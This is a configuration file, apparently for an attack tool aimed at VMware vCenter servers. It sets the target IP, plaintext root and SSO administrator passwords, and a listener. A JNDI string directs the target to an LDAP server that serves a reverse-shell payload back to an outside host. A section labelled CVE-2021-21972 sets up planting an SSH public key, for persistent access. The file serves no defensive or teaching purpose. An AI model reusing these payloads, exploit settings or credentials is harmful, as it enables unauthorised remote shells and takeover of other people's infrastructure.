[vc70]
; vcenter ip address
vc_ip = 192.168.31.203

; vcenter ssh user and password
ssh_user = root
ssh_pass = Hyx@0913676797

; vcenter sso user(dn format) and password
ldap_user = cn=administrator,cn=users,dc=vsphere,dc=local
ldap_pass = Hyx@0913676797%%

; listener address
listener_ip = 192.168.80.31
listener_port = 8800

; jndi address
jndi = ldap://192.168.50.55:1389/TomcatBypass/ReverseShell/192.168.50.55/7000

; CVE-2021-21972
local_file = C:\Users\ateam\.ssh\id_rsa.pub
; 'target_file': '/home/vsphere-ui/.ssh/authorized_keys'
target_file = /tmp/hello


[vc67]
hello = world

[vc65]
hello = world